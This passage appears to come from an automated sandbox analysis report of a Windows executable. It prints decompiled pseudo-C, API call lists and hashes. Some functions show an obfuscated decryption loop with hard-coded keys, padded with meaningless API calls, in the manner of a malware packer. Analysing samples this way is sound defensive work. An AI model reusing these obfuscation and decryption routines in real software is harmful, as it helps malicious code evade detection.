                • GetLongPathNameA.KERNEL32 ref: 00403F78
                • WritePrivateProfileStructW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00403F88
                • IsBadReadPtr.KERNEL32(00000000,00000000), ref: 00403F92
                • CancelWaitableTimer.KERNEL32(00000000), ref: 00403F9A
                • GetFileType.KERNEL32(00000000), ref: 00403FA2
                • GetModuleHandleA.KERNEL32(00000000), ref: 00403FAA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: Console$File$Create$Free$CharModuleNamePrivateProfileWrite$AliasesAttachAttributesBreakCancelCommCursorDebugDriveEnumErrorEventExchangeFloatFontsGenericHandleInfoInterlockedLastLengthLogicalLongMappingMaskMultipleMutexObjectsPathReadReplaceSleepStateStringStringsStructTimerTypeVersionWaitWaitableWidthWidthslstrcmpi
                • String ID: )O$;hmC$>P$TDu$UA\$hagayaxewewagucizinahegej$j;:-$wilofusasonamapofedahu${${*,$}k{8$}u_h
                • API String ID: 1899468939-3306136125
                • Opcode ID: 2e2ecd3971922190b2c5bb1d85dbd43ab1665a490a6c8ae08c4110cafdc87cda
                • Instruction ID: 829d75c2ae4df94ea4db4ecf5691a90b83a113486eb31741d8e040f6f05984f1
                • Opcode Fuzzy Hash: 2e2ecd3971922190b2c5bb1d85dbd43ab1665a490a6c8ae08c4110cafdc87cda
                • Instruction Fuzzy Hash: C6F175756083809FD3609F66D986B4ABBF4FB84704F10491DF6D9AB2A0C7B49984CF4B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00403660(intOrPtr _a4, struct _SMALL_RECT _a8, unsigned int _a12, char _a40, short _a1064, char _a3100) {
                				struct _SMALL_RECT _v0;
                				struct _CHAR_INFO _v4;
                				long _v8;
                				struct _COORD _v16;
                				unsigned int _t21;
                				intOrPtr* _t34;
                				intOrPtr _t35;
                
                				L0040EBC0(0x142c);
                				_t35 =  *0x667ed4;
                				_t21 =  *0x667f64 >> 3;
                				if(_t21 > 0) {
                					_t34 = __imp__FindNextVolumeA;
                					_a4 = _t35;
                					_a12 = _t21;
                					do {
                						if( *0x667f64 == 0x959) {
                							GetNumberFormatW(0, 0, L"bisasijucifaw", 0,  &_a1064, 0);
                							GetModuleHandleA("bizifoditutig");
                							 *_t34(0,  &_a40, 0);
                							GetModuleFileNameA(0, 0, 0);
                							__imp__FindFirstVolumeMountPointW(L"povinatufopewehepogiyexaveboside",  &_a3100, 0);
                							_v16.Y = 0;
                							_v16.X = 0;
                							ScrollConsoleScreenBufferA(0,  &_v0,  &_a8, _v16,  &_v4);
                							GetModuleHandleW(L"mojuforafuzudogudukeyitofoh");
                							InterlockedExchangeAdd( &_v8, 0);
                							GetCurrentThreadId();
                						}
                						_t21 = E00403450(_a4);
                						_v0.Left = _v0.Left + 8;
                						_t16 =  &_a8;
                						 *_t16 = _a8.Left - 1;
                					} while ( *_t16 != 0);
                				}
                				return _t21;
                			}

                APIs
                • GetNumberFormatW.KERNEL32 ref: 004036C9
                • GetModuleHandleA.KERNEL32(bizifoditutig), ref: 004036D0
                • FindNextVolumeA.KERNEL32(00000000,?,00000000), ref: 004036DB
                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000000), ref: 004036E3
                • FindFirstVolumeMountPointW.KERNEL32(povinatufopewehepogiyexaveboside,?,00000000), ref: 004036F4
                • ScrollConsoleScreenBufferA.KERNEL32(00000000,?,?,?,?), ref: 0040371E
                • GetModuleHandleW.KERNEL32(mojuforafuzudogudukeyitofoh), ref: 00403729
                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00403736
                • GetCurrentThreadId.KERNEL32 ref: 0040373C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: Module$FindHandleVolume$BufferConsoleCurrentExchangeFileFirstFormatInterlockedMountNameNextNumberPointScreenScrollThread
                • String ID: bisasijucifaw$bizifoditutig$mojuforafuzudogudukeyitofoh$povinatufopewehepogiyexaveboside
                • API String ID: 2995853831-2424065264
                • Opcode ID: 482c48cde1d95730a1d92f359f5e9431c195c781ef6e427e28cf541b6f36c516
                • Instruction ID: 19507b4272d04ca67e923924e88bede71011e0f8584c50739a0e9bb3dc9cb187
                • Opcode Fuzzy Hash: 482c48cde1d95730a1d92f359f5e9431c195c781ef6e427e28cf541b6f36c516
                • Instruction Fuzzy Hash: 5D21DB71248301AFD310EF61DE45F6B77B8EBC8B45F40442EF244A72E0C6B4AA44CB6A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00403EC8(char _a16, char _a176, char _a480, void _a2532, char _a3552) {
                				intOrPtr* _t31;
                				intOrPtr* _t33;
                
                				do {
                					if( *0x667f64 == 0x86) {
                						 *_t33(0, 0, 0, 0, 0, 0);
                						WritePrivateProfileStringW(0, 0, 0, 0);
                					}
                					if( *0x667f64 == 0xf) {
                						lstrcmpiW(0, 0);
                						CreateEventW(0, 0, 0, 0);
                					}
                					_t1 =  &_a16;
                					 *_t1 = _a16 - 1;
                				} while ( *_t1 != 0);
                				_t31 = __imp__CreateActCtxA;
                				_a16 = 0x3078f;
                				do {
                					if( *0x667f64 == 0x83) {
                						MulDiv(0, 0, 0);
                						 *_t31( &_a176);
                						GetFileAttributesExW(0, 0,  &_a2532);
                						GetLogicalDriveStringsA(0,  &_a3552);
                						__imp__GetLongPathNameA(0,  &_a480, 0);
                						WritePrivateProfileStructW(0, 0, 0, 0, 0);
                						IsBadReadPtr(0, 0);
                						CancelWaitableTimer(0);
                						GetFileType(0);
                						GetModuleHandleA(0);
                					}
                					_t8 =  &_a16;
                					 *_t8 = _a16 - 1;
                				} while ( *_t8 != 0);
                				E004033B0();
                				 *0x667f58 =  *0x667ed4;
                				goto __eax;
                			}

                APIs
                • ReplaceFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403EE8
                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403EF2
                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403F01
                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F0B
                • MulDiv.KERNEL32(00000000,00000000,00000000), ref: 00403F46
                • CreateActCtxA.KERNEL32(?), ref: 00403F50
                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00403F5E
                • GetLogicalDriveStringsA.KERNEL32 ref: 00403F6A
                • GetLongPathNameA.KERNEL32 ref: 00403F78
                • WritePrivateProfileStructW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00403F88
                • IsBadReadPtr.KERNEL32(00000000,00000000), ref: 00403F92
                • CancelWaitableTimer.KERNEL32(00000000), ref: 00403F9A
                • GetFileType.KERNEL32(00000000), ref: 00403FA2
                • GetModuleHandleA.KERNEL32(00000000), ref: 00403FAA
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: File$CreatePrivateProfileWrite$AttributesCancelDriveEventHandleLogicalLongModuleNamePathReadReplaceStringStringsStructTimerTypeWaitablelstrcmpi
                • String ID:
                • API String ID: 901593100-0
                • Opcode ID: f3f05c01b2b62f6b8c022d439cca62ae1031a8b82576fceb58765373a2d8033f
                • Instruction ID: 1e51498067b73abe089741691a4aa391f74c17f44d54677dbb9b545ee236fe69
                • Opcode Fuzzy Hash: f3f05c01b2b62f6b8c022d439cca62ae1031a8b82576fceb58765373a2d8033f
                • Instruction Fuzzy Hash: A8213631688384AFF360AF91ED46F9A7764EB44B16F104426F7486A1E0CBF46548CB6A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E004091D6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                				struct HINSTANCE__* _t23;
                				intOrPtr _t28;
                				intOrPtr _t32;
                				intOrPtr _t45;
                				void* _t46;
                
                				_t35 = __ebx;
                				_push(0xc);
                				_push(0x428450);
                				E00407404(__ebx, __edi, __esi);
                				_t44 = L"KERNEL32.DLL";
                				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                				if(_t23 == 0) {
                					_t23 = E004084DD(_t44);
                				}
                				 *(_t46 - 0x1c) = _t23;
                				_t45 =  *((intOrPtr*)(_t46 + 8));
                				 *((intOrPtr*)(_t45 + 0x5c)) = 0x401a08;
                				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                				if(_t23 != 0) {
                					_t35 = GetProcAddress;
                					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                				}
                				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                				 *((char*)(_t45 + 0xc8)) = 0x43;
                				 *((char*)(_t45 + 0x14b)) = 0x43;
                				 *(_t45 + 0x68) = 0x42a7c8;
                				E00409F79(_t35, 1, 0xd);
                				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                				InterlockedIncrement( *(_t45 + 0x68));
                				 *(_t46 - 4) = 0xfffffffe;
                				E004092AB();
                				E00409F79(_t35, 1, 0xc);
                				 *(_t46 - 4) = 1;
                				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                				if(_t28 == 0) {
                					_t32 =  *0x42add0; // 0x42acf8
                					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                				}
                				E0040BCF6( *((intOrPtr*)(_t45 + 0x6c)));
                				 *(_t46 - 4) = 0xfffffffe;
                				return E00407449(E004092B4());
                			}
                0x004091d6
                0x004091d6
                0x004091d8
                0x004091dd
                0x004091e2
                0x004091e8
                0x004091f0
                0x004091f3
                0x004091f8
                0x004091f9
                0x004091fc
                0x004091ff
                0x00409209
                0x0040920e
                0x00409216
                0x0040921e
                0x0040922e
                0x0040922e
                0x00409234
                0x00409237
                0x0040923e
                0x00409245
                0x0040924e
                0x00409254
                0x0040925b
                0x00409261
                0x00409268
                0x0040926f
                0x00409275
                0x00409278
                0x0040927b
                0x00409280
                0x00409282
                0x00409287
                0x00409287
                0x0040928d
                0x00409293
                0x004092a4

                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00428450,0000000C,00409311,00000000,00000000,?,?,00406559,00406AC8), ref: 004091E8
                • __crt_waiting_on_module_handle.LIBCMT ref: 004091F3
                  • Part of subcall function 004084DD: Sleep.KERNEL32(000003E8,00000000,?,00409139,KERNEL32.DLL,?,00409185,?,?,00406559,00406AC8), ref: 004084E9
                  • Part of subcall function 004084DD: GetModuleHandleW.KERNEL32(?,?,00409139,KERNEL32.DLL,?,00409185,?,?,00406559,00406AC8), ref: 004084F2
                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040921C
                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040922C
                • __lock.LIBCMT ref: 0040924E
                • InterlockedIncrement.KERNEL32(0042A7C8), ref: 0040925B
                • __lock.LIBCMT ref: 0040926F
                • ___addlocaleref.LIBCMT ref: 0040928D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                • API String ID: 1028249917-2843748187
                • Opcode ID: 68256f4be896964c5d435e25741913e8686e0de5fc390827696fc5543748ed05
                • Instruction ID: fc8438a26ca637893680a080df1e2d86f67f339e7b898e06238f5e0f13d8e124
                • Opcode Fuzzy Hash: 68256f4be896964c5d435e25741913e8686e0de5fc390827696fc5543748ed05
                • Instruction Fuzzy Hash: AE118171901702AFD720EF669941B4ABBE0AF04318F10457FE499B62E2CB78A9419F5D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00403450(unsigned int* _a4) {
                				char _v1024;
                				long _v1028;
                				intOrPtr _v1032;
                				intOrPtr _v1036;
                				char _v1040;
                				struct _COORD _v1044;
                				signed int _v1048;
                				char _v1052;
                				signed int _v1056;
                				signed int _v1060;
                				signed int _v1064;
                				unsigned int _v1068;
                				unsigned int _v1072;
                				signed int _v1076;
                				void* __edi;
                				intOrPtr* _t78;
                				intOrPtr _t80;
                				signed int _t82;
                				unsigned int* _t100;
                				intOrPtr _t106;
                				intOrPtr _t108;
                				intOrPtr _t109;
                				signed int _t125;
                				intOrPtr _t126;
                
                				_t78 = _a4;
                				_t106 =  *0x42b648; // 0x8432243a
                				_t126 =  *0x42b64c; // 0xd4efccad
                				_v1072 =  *_t78;
                				_v1068 =  *((intOrPtr*)(_t78 + 4));
                				_v1052 = 0;
                				E00403430( &_v1052,  *_t78);
                				_v1052 = _v1052 + 0x23f;
                				if( *0x667f64 == 0x14) {
                					EnumResourceLanguagesW(0, L"mifotupoh", L"jeguxufo xevuholucedumahemalaxavebu", 0, 0);
                				}
                				_t80 =  *0x42b650; // 0x16c4cd93
                				_t108 =  *0x42b654; // 0x315399cb
                				_v1036 = _t80;
                				_v1032 = _t108;
                				_v1040 = 0x20;
                				do {
                					_v1064 = 2;
                					_v1064 = _v1064 + 3;
                					_t109 =  *0x667f64;
                					_t82 = _v1072 << 4;
                					_v1076 = _t82;
                					if(_t109 == 0xc) {
                						_v1044.Y = 0;
                						_v1044.X = 0;
                						ReadConsoleOutputCharacterA(0,  &_v1024, 0, _v1044,  &_v1028);
                						_t82 = _v1076;
                						_t109 =  *0x667f64;
                					}
                					_v1076 = _t82 + _v1036;
                					if(_t109 != 0xfa9) {
                						if(_t109 == 0x3eb) {
                							 *0x667ed0 = 0;
                						}
                					} else {
                						 *0x667f60 = 0xedeb2e40;
                					}
                					_v1060 = _v1072;
                					_v1060 = _v1060 + _v1052;
                					 *0x667f5c = 0xf4ea3dee;
                					_v1048 = _v1072 >> _v1064;
                					E00403440( &_v1048, _v1032);
                					_v1076 = _v1076 ^ _v1060;
                					if( *0x667f64 == 0x9e6) {
                						OpenMutexW(0, 0, L"Kis");
                					}
                					_v1048 = _v1048 ^ _v1076;
                					_v1068 = _v1068 + 0x64;
                					_v1068 = _v1068 - _v1048;
                					_v1068 = _v1068 - 0x64;
                					E00403420(_v1068,  &_v1076);
                					_v1076 = _v1076 + _t106;
                					_v1056 = 0;
                					_v1056 = _v1056 + _v1052;
                					_v1056 = _v1056 + _v1068;
                					_v1060 = _v1056;
                					_t113 = _v1064;
                					_t125 = (_v1068 >> _v1064) + _t126;
                					_v1076 = _v1076 ^ _v1060;
                					if( *0x667f64 == 0x121) {
                						__imp__AddConsoleAliasW(0, 0, 0);
                					}
                					_v1076 = _v1076 ^ _t125;
                					_v1072 = _v1072 - _v1076;
                					E00403410( &_v1052, _t113, 0);
                					_t72 =  &_v1040;
                					 *_t72 = _v1040 - 1;
                				} while ( *_t72 != 0);
                				_t100 = _a4;
                				 *_t100 = _v1072;
                				_t100[1] = _v1068;
                				return _t100;
                			}
                0x00403456
                0x00403463
                0x0040346a
                0x00403478
                0x0040347c
                0x00403480
                0x00403484
                0x00403489
                0x00403498
                0x004034a7
                0x004034a7
                0x004034ad
                0x004034b2
                0x004034b8
                0x004034bc
                0x004034c0
                0x004034d0
                0x004034d0
                0x004034d8
                0x004034e1
                0x004034e7
                0x004034ea
                0x004034f1
                0x004034f7
                0x00403501
                0x00403512
                0x00403518
                0x0040351c
                0x0040351c
                0x00403526
                0x00403530
                0x00403544
                0x00403546
                0x00403546
                0x00403532
                0x00403532
                0x00403532
                0x00403550
                0x00403558
                0x0040356e
                0x00403578
                0x0040357c
                0x00403585
                0x00403593
                0x0040359c
                0x0040359c
                0x004035a6
                0x004035ae
                0x004035b3
                0x004035b7
                0x004035c4
                0x004035c9
                0x004035cd
                0x004035d5
                0x004035de
                0x004035e6
                0x004035ee
                0x004035f4
                0x004035fa
                0x00403608
                0x0040360d
                0x0040360d
                0x00403613
                0x0040361b
                0x00403623
                0x00403628
                0x00403628
                0x00403628
                0x00403633
                0x00403645
                0x00403647
                0x00403651

                APIs
                • EnumResourceLanguagesW.KERNEL32 ref: 004034A7
                • ReadConsoleOutputCharacterA.KERNEL32(00000000,?,00000000,00000020,?), ref: 00403512
                • OpenMutexW.KERNEL32(00000000,00000000,Kis), ref: 0040359C
                • AddConsoleAliasW.KERNEL32(00000000,00000000,00000000), ref: 0040360D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: Console$AliasCharacterEnumLanguagesMutexOpenOutputReadResource
                • String ID: $Kis$d$jeguxufo xevuholucedumahemalaxavebu$mifotupoh
                • API String ID: 3309625250-456979391
                • Opcode ID: 327142d5e08070fa53213981188f08cd567707b7fc8986b1b84cc82561de3fce
                • Instruction ID: a56c4c5d8b00a0ac0ce190d433959f56fd084e54d139ce93484046b40ae91c12
                • Opcode Fuzzy Hash: 327142d5e08070fa53213981188f08cd567707b7fc8986b1b84cc82561de3fce
                • Instruction Fuzzy Hash: 2F5100755083419FC314CF2AD98492BBBF4FBD8718F404A2EF489A3260C374EA49CB5A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E004056F3(intOrPtr __ecx) {
                				void* _t47;
                				intOrPtr _t48;
                				void* _t53;
                				void* _t54;
                				void* _t56;
                				intOrPtr _t57;
                				void* _t58;
                				void* _t61;
                
                				_push(0x2c);
                				_push(0x4282d0);
                				E00407404(_t47, _t54, _t56);
                				_t48 = __ecx;
                				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                				_t57 =  *((intOrPtr*)(_t58 + 8));
                				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                				 *((intOrPtr*)(_t58 - 0x28)) = E00405236(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00409336(__ecx, _t53, _t61) + 0x88));
                				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00409336(_t48, _t53, _t61) + 0x8c));
                				 *((intOrPtr*)(E00409336(_t48, _t53, _t61) + 0x88)) = _t57;
                				 *((intOrPtr*)(E00409336(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                				 *(_t58 - 4) = 1;
                				 *((intOrPtr*)(_t58 - 0x1c)) = E004052DB(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                				 *(_t58 - 4) = 0xfffffffe;
                				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                				E00405819(_t48, _t55, _t57);
                				return E00407449( *((intOrPtr*)(_t58 - 0x1c)));
                			}
                0x004056f3
                0x004056f5
                0x004056fa
                0x004056ff
                0x00405701
                0x00405704
                0x00405707
                0x0040570a
                0x00405711
                0x00405722
                0x00405730
                0x0040573e
                0x00405746
                0x00405754
                0x0040575a
                0x00405761
                0x00405764
                0x0040577a
                0x0040577d
                0x004057f2
                0x004057f9
                0x00405800
                0x0040580d

                APIs
                • __CreateFrameInfo.LIBCMT ref: 0040571B
                  • Part of subcall function 00405236: __getptd.LIBCMT ref: 00405244
                  • Part of subcall function 00405236: __getptd.LIBCMT ref: 00405252
                • __getptd.LIBCMT ref: 00405725
                  • Part of subcall function 00409336: __getptd_noexit.LIBCMT ref: 00409339
                  • Part of subcall function 00409336: __amsg_exit.LIBCMT ref: 00409346
                • __getptd.LIBCMT ref: 00405733
                • __getptd.LIBCMT ref: 00405741
                • __getptd.LIBCMT ref: 0040574C
                • _CallCatchBlock2.LIBCMT ref: 00405772
                  • Part of subcall function 004052DB: __CallSettingFrame@12.LIBCMT ref: 00405327
                  • Part of subcall function 00405819: __getptd.LIBCMT ref: 00405828
                  • Part of subcall function 00405819: __getptd.LIBCMT ref: 00405836
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                • String ID:
                • API String ID: 1602911419-0
                • Opcode ID: 19292ffba2a9be088c4ceb34838378d7a00e069328f228661fdbde71ff2e5fd1
                • Instruction ID: 794748d5a1fe47ae6608aa13b861251fba8ff341c13894f19401e09624ddf452
                • Opcode Fuzzy Hash: 19292ffba2a9be088c4ceb34838378d7a00e069328f228661fdbde71ff2e5fd1
                • Instruction Fuzzy Hash: 9411DA71D40209EFDB10EFA5D546A9E7BB0FF08318F50806EF814A7292DB3899119F55
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E0040B6F0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                				signed int _t15;
                				LONG* _t21;
                				long _t23;
                				void* _t31;
                				LONG* _t33;
                				void* _t34;
                				void* _t35;
                
                				_t35 = __eflags;
                				_t29 = __edx;
                				_t25 = __ebx;
                				_push(0xc);
                				_push(0x428540);
                				E00407404(__ebx, __edi, __esi);
                				_t31 = E00409336(__ebx, __edx, _t35);
                				_t15 =  *0x42acec; // 0xfffffffe
                				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                					E00409F79(_t25, _t31, 0xd);
                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                					_t33 =  *(_t31 + 0x68);
                					 *(_t34 - 0x1c) = _t33;
                					__eflags = _t33 -  *0x42abf0; // 0x8b1608
                					if(__eflags != 0) {
                						__eflags = _t33;
                						if(_t33 != 0) {
                							_t23 = InterlockedDecrement(_t33);
                							__eflags = _t23;
                							if(_t23 == 0) {
                								__eflags = _t33 - 0x42a7c8;
                								if(__eflags != 0) {
                									_push(_t33);
                									E00406A51(_t25, _t31, _t33, __eflags);
                								}
                							}
                						}
                						_t21 =  *0x42abf0; // 0x8b1608
                						 *(_t31 + 0x68) = _t21;
                						_t33 =  *0x42abf0; // 0x8b1608
                						 *(_t34 - 0x1c) = _t33;
                						InterlockedIncrement(_t33);
                					}
                					 *(_t34 - 4) = 0xfffffffe;
                					E0040B78B();
                				} else {
                					_t33 =  *(_t31 + 0x68);
                				}
                				if(_t33 == 0) {
                					E0040850D(_t29, 0x20);
                				}
                				return E00407449(_t33);
                			}
                0x0040b6f0
                0x0040b6f0
                0x0040b6f0
                0x0040b6f0
                0x0040b6f2
                0x0040b6f7
                0x0040b701
                0x0040b703
                0x0040b70b
                0x0040b72c
                0x0040b732
                0x0040b736
                0x0040b739
                0x0040b73c
                0x0040b742
                0x0040b744
                0x0040b746
                0x0040b749
                0x0040b74f
                0x0040b751
                0x0040b753
                0x0040b759
                0x0040b75b
                0x0040b75c
                0x0040b761
                0x0040b759
                0x0040b751
                0x0040b762
                0x0040b767
                0x0040b76a
                0x0040b770
                0x0040b774
                0x0040b774
                0x0040b77a
                0x0040b781
                0x0040b713
                0x0040b713
                0x0040b713
                0x0040b718
                0x0040b71c
                0x0040b721
                0x0040b729

                APIs
                • __getptd.LIBCMT ref: 0040B6FC
                  • Part of subcall function 00409336: __getptd_noexit.LIBCMT ref: 00409339
                  • Part of subcall function 00409336: __amsg_exit.LIBCMT ref: 00409346
                • __amsg_exit.LIBCMT ref: 0040B71C
                • __lock.LIBCMT ref: 0040B72C
                • InterlockedDecrement.KERNEL32(?), ref: 0040B749
                • InterlockedIncrement.KERNEL32(008B1608), ref: 0040B774
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                • String ID:
                • API String ID: 4271482742-0
                • Opcode ID: 8cdf4d8e4d9f20106b5351e911dd18681c6c75bb76eaccecfd36a8c14c587c9a
                • Instruction ID: 57e374f5b7c55cbf4d0102de865f26309dd3feaea6e2191c399ad46f9a8137bc
                • Opcode Fuzzy Hash: 8cdf4d8e4d9f20106b5351e911dd18681c6c75bb76eaccecfd36a8c14c587c9a
                • Instruction Fuzzy Hash: DF015E31A40622ABC721AB66954675E7760FB44714F54403BF800B73E1DB7CAD92CBDE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 39%
                			E00406A51(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                				intOrPtr* _t10;
                				intOrPtr _t13;
                				intOrPtr _t23;
                				void* _t25;
                
                				_push(0xc);
                				_push(0x428390);
                				_t8 = E00407404(__ebx, __edi, __esi);
                				_t23 =  *((intOrPtr*)(_t25 + 8));
                				if(_t23 == 0) {
                					L9:
                					return E00407449(_t8);
                				}
                				if( *0x66e6e4 != 3) {
                					_push(_t23);
                					L7:
                					if(HeapFree( *0x42c0fc, 0, ??) == 0) {
                						_t10 = E00406554();
                						 *_t10 = E00406512(GetLastError());
                					}
                					goto L9;
                				}
                				E00409F79(__ebx, __edi, 4);
                				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                				_t13 = E00409FAC(_t23);
                				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                				if(_t13 != 0) {
                					_push(_t23);
                					_push(_t13);
                					E00409FDC();
                				}
                				 *(_t25 - 4) = 0xfffffffe;
                				_t8 = E00406AA7();
                				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                					goto L9;
                				} else {
                					_push( *((intOrPtr*)(_t25 + 8)));
                					goto L7;
                				}
                			}
                0x00406a51
                0x00406a53
                0x00406a58
                0x00406a5d
                0x00406a62
                0x00406ad9
                0x00406ade
                0x00406ade
                0x00406a6b
                0x00406ab0
                0x00406ab1
                0x00406ac1
                0x00406ac3
                0x00406ad6
                0x00406ad8
                0x00000000
                0x00406ac1
                0x00406a6f
                0x00406a75
                0x00406a7a
                0x00406a80
                0x00406a85
                0x00406a87
                0x00406a88
                0x00406a89
                0x00406a8f
                0x00406a90
                0x00406a97
                0x00406aa0
                0x00000000
                0x00406aa2
                0x00406aa2
                0x00000000
                0x00406aa2

                APIs
                • __lock.LIBCMT ref: 00406A6F
                  • Part of subcall function 00409F79: __mtinitlocknum.LIBCMT ref: 00409F8F
                  • Part of subcall function 00409F79: __amsg_exit.LIBCMT ref: 00409F9B
                  • Part of subcall function 00409F79: EnterCriticalSection.KERNEL32(?,?,?,0040766D,00000004,004283D0,0000000C,0040BF9C,?,?,00000000,00000000,00000000,?,004092E8,00000001), ref: 00409FA3
                • ___sbh_find_block.LIBCMT ref: 00406A7A
                • ___sbh_free_block.LIBCMT ref: 00406A89
                • HeapFree.KERNEL32(00000000,?,00428390,0000000C,00407322,004032E5), ref: 00406AB9
                • GetLastError.KERNEL32(?,?,?,?,00428390,0000000C,00407322,004032E5), ref: 00406ACA
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
